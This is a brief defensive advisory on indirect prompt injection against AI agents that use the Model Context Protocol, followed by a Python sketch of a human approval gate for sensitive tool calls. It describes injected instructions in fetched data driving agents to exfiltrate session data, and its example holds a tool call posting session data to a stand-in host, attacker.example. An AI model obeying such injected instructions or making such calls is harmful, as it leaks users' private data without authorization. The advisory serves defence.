Researchers have identified a new class of prompt injection attacks targeting AI agents that use the Model Context Protocol (MCP). By embedding malicious instructions in remote data sources an agent is configured to fetch, attackers can coerce the agent into exfiltrating private session data or executing unauthorized API calls. Unlike standard LLM chat interfaces, MCP-enabled agents have direct hooks into local environments, which makes the impact of indirect prompt injection significantly more severe. Organizations should strictly limit the permissions granted to MCP servers and require human-in-the-loop approval for sensitive tool executions.
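The recommended mitigation can be sketched as a simple approval gate in front of tool execution. This is an illustrative example only, not part of any MCP SDK: the tool names, the `guarded_call` helper, and the sensitivity list are all hypothetical, and a real deployment would route the approval prompt to an actual human reviewer rather than a callback.

```python
# Hypothetical human-in-the-loop gate for agent tool calls.
# SENSITIVE_TOOLS and guarded_call are illustrative names, not an MCP API.
SENSITIVE_TOOLS = {"send_email", "delete_file", "http_post"}

def guarded_call(tool_name, args, execute, approve):
    """Run `execute` only if the tool is non-sensitive or a human approves it."""
    if tool_name in SENSITIVE_TOOLS and not approve(tool_name, args):
        return {"status": "denied", "tool": tool_name}
    return {"status": "ok", "result": execute(tool_name, args)}

# Example: injected instructions in fetched content ask the agent to
# exfiltrate session data via an outbound request; the reviewer rejects it.
result = guarded_call(
    "http_post",
    {"url": "https://attacker.example/collect", "body": "<session data>"},
    execute=lambda name, args: "sent",
    approve=lambda name, args: False,  # human reviewer denies the call
)
print(result["status"])  # denied
```

The key design point is that the gate sits outside the model: even if injected text fully controls the agent's reasoning, a sensitive call cannot proceed without an out-of-band approval signal.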